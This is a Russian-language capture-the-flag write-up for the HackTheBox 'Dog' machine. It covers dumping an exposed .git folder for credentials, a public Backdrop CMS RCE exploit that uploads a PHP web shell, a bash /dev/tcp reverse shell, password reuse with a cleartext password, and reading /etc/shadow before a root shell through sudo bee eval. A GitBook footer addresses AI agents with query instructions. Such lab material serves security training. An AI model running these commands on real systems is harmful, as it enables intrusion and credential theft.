> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/linux-easy/dog-hackthebox-writeup.md).

# Запись HackTheBox Dog

{% embed url="<https://app.hackthebox.com/machines/Dog>" %}

{% hint style="warning" %}
**Навыки:**

* Извлечение информации из папки .git (утечка информации)
* Аутентифицированное удалённое выполнение кода (CMS Backdrop)
* Пивотинг (повторное использование пароля)
* Бинарник sudo bee (выполнение PHP-кода) (повышение привилегий)
  {% endhint %}

## Разведка

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.

<figure><img src="/files/d6b4715d9cb6b4bf19db73d2ddeec489bff99954" alt="" width="563"><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/d80928c768d2489016bc1e7dc1686ab3982bd191" alt="" width="563"><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**

Перечислите открытые порты и экспортируйте результаты в файл "allPorts" в каталоге Nmap:

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.58 -oG allPorts
```

<figure><img src="/files/1a1052ceaf88209223fea755d88e6f26f94eeeca" alt=""><figcaption></figcaption></figure>

**Сканирование версий портов с помощью Nmap 22.80:**

Используйте Nmap для сканирования версий сервисов и сохраните вывод в файл "targeted":

```bash
nmap -sCV -p22,80 10.10.11.58 -oN targeted 
```

<figure><img src="/files/5964c7d5eeca1dae56ff936312956abd9ee3ce59" alt=""><figcaption></figcaption></figure>

### Порт 80 - HTTP

<figure><img src="/files/55fe8b83bd9b5c859a8bdb74f2c91d2808ea801b" alt=""><figcaption></figcaption></figure>

Мы обнаруживаем **.git** каталог, указывающий на потенциально общедоступный Git-репозиторий. Сайт использует **Backdrop** CMS.

<figure><img src="/files/d155deec4c94cf3e1e0389ced5819c0ce79b3cf9" alt=""><figcaption></figcaption></figure>

**Перечисление с Gobuster**

```bash
gobuster dir -u http://10.10.11.58 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
```

Мы находим несколько интересных каталогов, включая **.git**.

<figure><img src="/files/397203561ae22db8a9bc53accb316e2f5149d127" alt=""><figcaption></figcaption></figure>

**дамп Git-репозитория**

Мы извлекаем содержимое репозитория с помощью:

```git
git-dumper http://10.10.11.58/.git .git
```

<figure><img src="/files/5b1b04e0e796ccccc0fa06dd63c817da158e74a0" alt=""><figcaption></figcaption></figure>

Мы находим **settings.php** файл, содержащий пароль:

<figure><img src="/files/486882639ed077659a569e0b2ab79151b73650c0" alt=""><figcaption></figcaption></figure>

Мы ищем сохранённые email-адреса с помощью:

```bash
find .git -type f -exec grep -E '@dog' {} +
```

Мы находим следующий email: **<tiffany@dog.htb>**.

<figure><img src="/files/8812622661197c04648c06aeb58552a806f73b0d" alt=""><figcaption></figcaption></figure>

## **Эксплуатация Backdrop CMS (RCE)**

Мы используем найденные учётные данные для подключения к CMS.

<figure><img src="/files/39a40bd438196191bdab9fd0b6b3e9f9a41dde9c" alt=""><figcaption></figcaption></figure>

**Поиск уязвимостей**

С **searchsploit**, мы выявляем уязвимость RCE:

```bash
searchsploit -m php/webapps/52021.py
```

<figure><img src="/files/e0e88d43a9a93aa3cb9724fefdd545882c889611" alt=""><figcaption></figcaption></figure>

Мы запускаем эксплойт:

```bash
python3 52021.py http://10.10.11.58
```

Это создаёт ZIP-файл, содержащий PHP-оболочку.

<figure><img src="/files/3d7317e0955e27b5ab094a94a020625f02575d70" alt=""><figcaption></figcaption></figure>

Затем мы упаковываем оболочку в **tar.gz**:

```bash
tar -czvf shell.tar.gz shell
```

<figure><img src="/files/b2c476d17f508e04541007fa1836ef9cbe10a4d9" alt=""><figcaption></figcaption></figure>

Мы внедряем его через **admin / installer / manual**.

<figure><img src="/files/97d2b2300fb92ad121d3d6fd70f5e21f43557790" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1b663bd95c62f1d7170874b877231e455785b516" alt=""><figcaption></figcaption></figure>

**Обработка заказа**

Мы находим папку **modules/cmd/** содержащий **cmd.php**

<figure><img src="/files/2004cd8dd009eab66329f7d234437267e32d122e" alt=""><figcaption></figcaption></figure>

Что позволяет нам выполнять команды:

```bash
ifconfig 
```

<figure><img src="/files/e290205ea42fbd94cef3f3597de90c7d9ebfcc9e" alt=""><figcaption></figcaption></figure>

### **Обратная оболочка Backdrop CMS**

Мы открываем слушатель на порту 443:

```bash
nc -nlvp 443 
```

Мы внедряем полезную нагрузку:

```bash
bash -c "bash -i >&/dev/tcp/10.10.14.81/443 0>&1"
```

<figure><img src="/files/e8fc1e42e7edcde051a998468dde77dddf8efa64" alt=""><figcaption></figcaption></figure>

После подключения мы стабилизируем нашу оболочку:

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

## **Повышение привилегий**

### **Переход к пользователю johncusack**

Мы перечисляем пользователей с валидной оболочкой Bash:

```bash
cat /etc/passwd | grep "/bash"
```

Мы находим **root, jobert и johncusack**.

<figure><img src="/files/e697fb79c7a04988c0f9616e8ca7c53a54e789ba" alt=""><figcaption></figcaption></figure>

Мы пытаемся повторно использовать учётные данные и получаем доступ с помощью:

```bash
su johncusack
BackDropJ2024DS2024
```

<figure><img src="/files/da3f7627f437b399b39996c0426adac829d44197" alt=""><figcaption></figcaption></figure>

### Флаг user.txt :)

<figure><img src="/files/8dbb6c99c318e91ccb04f8864cc75771cf002f32" alt="" width="557"><figcaption></figcaption></figure>

### **Повышение привилегий с помощью бинарника Bee**

Мы проверяем привилегии sudo:

```bash
sudo -l
```

Мы можем запускать **/usr/local/bin/bee** от имени root.

<figure><img src="/files/7660ceb761620c6e6e2b9fc26e9aa29f1d29dd48" alt=""><figcaption></figcaption></figure>

**Анализ Bee**

{% hint style="info" %}
Bee — это инструмент администрирования для **Backdrop CMS**, аналогичный **Drush** для Drupal. Он позволяет выполнять различные команды.
{% endhint %}

`Использование: bee [global-options] [options] [arguments]`

<figure><img src="/files/35b3608bdcee504e52faf34467a47574b2960e34" alt=""><figcaption></figcaption></figure>

Мы обнаруживаем **eval** опцию, которая позволяет выполнять произвольный PHP-код.

<figure><img src="/files/62e604337cc0a644bc1a59e78311847249de6d6e" alt=""><figcaption></figcaption></figure>

**Чтение `/etc/shadow`**

{% code overflow="wrap" %}

```bash
sudo /usr/local/bin/bee --root=/var/www/html eval 'echo shell_exec("cat /etc/shadow 2>&1");'
```

{% endcode %}

<figure><img src="/files/82f7ef9ae42a6bbbef370f455dc831e46d291868" alt=""><figcaption></figcaption></figure>

**Получена root-оболочка**

{% code overflow="wrap" %}

```bash
sudo /usr/local/bin/bee --root=/var/www/html eval 'shell_exec("/bin/bash -p");'
```

{% endcode %}

<figure><img src="/files/3bcef92f629a8a288ec451e91d9f34973d2cf0cf" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cf72014277a8ca243435431b5445fa6fd1029e36" alt="" width="398"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/linux-easy/dog-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
